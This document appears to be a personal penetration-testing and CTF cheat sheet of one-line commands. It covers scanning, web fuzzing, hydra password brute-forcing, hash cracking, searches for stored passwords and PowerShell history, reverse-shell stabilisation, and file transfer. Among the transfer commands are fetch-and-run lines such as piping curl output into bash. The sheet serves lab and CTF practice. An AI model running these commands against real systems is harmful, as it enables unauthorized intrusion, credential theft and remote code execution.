Image taken from CTF-CheatSheet.
Wikis
HackTricks
PentestBook
SQLMap
Fuff
portScanning
hailmaryScan
1
| sudo incursore.sh --type All -H $IP
|
tcpSynCommonPorts
1
| sudo nmap -sS -A -Pn --min-rate 10000 $IP
|
tcpSynAllPorts
1
| sudo nmap -sS -A -Pn --min-rate 10000 -p- $IP
|
vulnerabilityScanning
startNessusWSL2
1
| sudo /opt/nessus/sbin/nessus-service
|
webServerEnum
ZAP
Burp Suite
Postman
WAF
1
| nmap -Pn -p 443 --script http-waf-detect,http-waf-fingerprint $IP
|
tech
robots
1
| curl https://$IP/robots
|
1
| curl https://$IP/robots.txt
|
bannerGrabbing
fileExtensionSearch
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP/$dir/indexFUZZ -c -ac -ic
|
dirBustingAndFileSearch
1
| ffuf -u http://$domain/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -recursion -recursion-depth 1 -e .aspx,.html,.php,.txt,.jsp -c -ac -ic -v
|
1
| gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .aspx,.html,.php,.txt,.jsp
|
1
| dirsearch -u http://$IP
|
subdomainBusting
1
| gobuster dns -d $domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
|
1
| ffuf -u http://FUZZ.$domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -ac -c -ic
|
subdomainBustingWithLocalDnsAsResolver
1
| gobuster dns -d $domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r $IP:53
|
vhostBusting
1
| ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://$domain -H "HOST: FUZZ.$domain" -ac -c -ic
|
1
| gobuster vhost -u $URL -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt --append-domain
|
parameterFuzzing
getRequests
1
| ffuf -u http://internal.analysis.htb/users/list.php?FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -ic
|
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://$domain/$file.php?FUZZ=key -fs xxx
|
postRequests
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://$domain/$file -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
|
phpFiles
1
| ffuf -w $wordlist -u http://$url/$file -X POST -d '$param=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
|
Dictionary Attack - Basic HTTP Authentication
1
| hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $ip -s $port http-get / -f -u
|
1
| hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP -s $PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -f -u
|
kernelVersion
fileEnumLinux
SUIDS
1
| find / -perm -4000 2>/dev/null
|
1
| find / -perm -u=s 2>/dev/null
|
configFiles
1
| /var/www/html$ find . | grep config
|
dbStringsWithinConfigFiles
1
| /var/www/html$ grep database <filePath>
|
fileEnumWindows
RegistryFilesPasswordString
1
| reg query HKLM /f password /t REG_SZ /s
|
1
| reg query HKCU /f password /t REG_SZ /s
|
powershellHistory
1
| type C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
FTP
bounceAttack
1
| nmap -Pn -v -n -p80 -b <username>:<pass>@<IP> <target2scan>
|
bruteForce
1
| medusa -u <username> -P <passList> -h <IP> -M ftp
|
1
| hydra -l <username> -P <passList> ftp://<IP> -t 48
|
SSH
sshAudit
1
| python3 /opt/ssh-audit/ssh-audit.py $IP
|
bruteForce
1
| hydra -L <userList> -P <passwordList> ssh://$IP
|
hashCracking
Hashcat-examples
autodetectMode
1
| hashcat <hashes> /usr/share/wordlists/rockyou.txt --username
|
bruteForce
1
| hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --username
|
crackedHashes
1
| hashcat -m 3200 --username --show hashes
|
John hash formats
bruteForce
1
| john <hashes> --wordlist=/usr/share/wordlists/rockyou.txt
|
shellStabilization
withScript
1
| script -O /dev/null -q /bin/bash
|
withPython
1
| python3 -c 'import.pty;pty.spawn("/bin/bash")'
|
shellConfig
1
2
| ^Z
[1]+ Stopped nc -lvnp 1337
|
attackHostrowsAndCols
1
2
| echo $TERM
stty size # rows and cols
|
targetRowsAndCols
1
| www-data@50bca5e748b0:/var/www/html$ stty rows 51 cols 209
|
termExport
1
| www-data@50bca5e748b0:/var/www/html$ export TERM=xterm
|
fileTransferLinux
httpDownloadServer
1
| python2.7 -m SimpleHTTPServer
|
1
| ruby -run -ehttpd . -p8000
|
httpUploadServer
1
| python3 -m uploadserver
|
filelessExecution
1
| curl http://$IP/$file | bash
|
1
| wget -qO- https://$IP/pythonScript | python3
|
fileDownload
1
| wget http://$IP/$file -O $file
|
1
| curl http://$IP/$file -o $file
|
remoteServerDownload
1
| curl http://$IP/$file -o $file
|
local2Remote
1
| scp $file user@remoteHost:/tmp/$file
|
remote2Local
1
| scp user@remoteHost:$filePath $filePath2Save
|
httpsTranfser
1
| openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create self-sign cert
|
1
| mkdir https && cd https # create and move to webroot (must be different dir from the cert)
|
1
| sudo python3 -m uploadserver 443 --server-certificate /root/server.pem # start webServer using the cert
|
1
| curl -X POST https://$IP/upload -F 'files=@$file' -F 'files=@$file' --insecure # download from target
|
fileTransferWindows
fileDownload
1
| wget https://$IP/$file -O /tmp/$file
|
1
| curl -o /tmp/$file https://$IP/$file
|
1
| Invoke-WebRequest https://$IP/$file -OutFile $file
|
1
| bitsadmin /transfer n http://$IP/$file C:\Temp\$file
|
1
| certutil.exe -verifyctl -split -f http://$IP/$file
|
1
| php -r '$file = file_get_contents("https://$IP/$file"); file_put_contents("$file",$file);'
|
remote2Local
1
| scp user@remoteHost:/tmp/$file C:\Temp\$file
|
local2Remote
1
| scp C:\Temp\$file user@remoteHost:/tmp/$file
|
fileUpload
1
| Invoke-WebRequest -Uri http://$IP -Method POST -Body $b64
|
1
2
3
4
5
6
7
| locate linpeas
/usr/share/peass/linpeas/linpeas.sh
locate winpeas
/usr/share/peass/winpeas/winPEASany.exe
/usr/share/peass/winpeas/winPEASx64.exe
/usr/share/peass/winpeas/winPEASx86.exe
|
cryptography
encryption
alias rot13="tr 'A-Za-z' 'N-ZA-Mn-za-m'"
1
2
3
| # ROT13
echo '<plaintext>' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo '<ciphertext>' | tr 'N-ZA-Mn-za-m' 'A-Za-z'
|
1
2
3
| # ROT13.5 (ROT18) > ROT13 (for letters) and ROT5 (for numbers)
echo '<plaintext>' | tr 'A-Za-z0-9' 'N-ZA-Mn-za-m5-90-4'
echo '<ciphertext>' | tr 'N-ZA-Mn-za-m5-90-4' 'A-Za-z0-9'
|
1
2
3
| # ROT47
echo '<plaintext>' | tr '\!-~' 'P-~\!-O'
echo '<ciphertext>' | tr 'P-~\!-O' '\!-~'
|
1
2
3
4
5
6
7
8
| # ROT script
#!/usr/bin/bash
dual=abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz
phrase='<plaitext>'
rotat=13
newphrase=$(echo $phrase | tr "${dual:0:26}" "${dual:${rotat}:26}")
echo ${newphrase}
|
1
2
3
| # Caeser cipher
echo '<plaintext>' | tr '[a-zA-Z]' '[x-za-wX-ZA-W]'
echo '<ciphertext>' | tr '[x-za-wX-ZA-W]' '[a-zA-Z]'
|
1
2
3
| # vigenere
/opt/cryptography/vigenere.sh
/opt/cryptography/vigenere.sh -d
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| # Vigenere script
#!/usr/local/bin/bash
a="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
[[ "${*/-d/}" != "" ]] &&
echo "Usage: $0 [-d]" && exit 1
m=${1:+-}
printf "string: ";read t
printf "keyphrase: ";read -s k
printf "\n"
for ((i=0;i<${#t};i++)); do
p1=${a%%${t:$i:1}*}
p2=${a%%${k:$((i%${#k})):1}*}
d="${d}${a:$(((${#p1}${m:-+}${#p2})%${#a})):1}"
done
echo "$d"
|
encoding
1
2
| base64 $text
base64 -d $text
|
hashing
1
2
3
| openssl md5 $text
openssl sha1 $text
openssl sha256 $text
|
1
2
3
| md5sum $text
sha1sum $text
sha256sum $text
|
SQLMap
1
| sqlmap -u "$URL" --batch
|
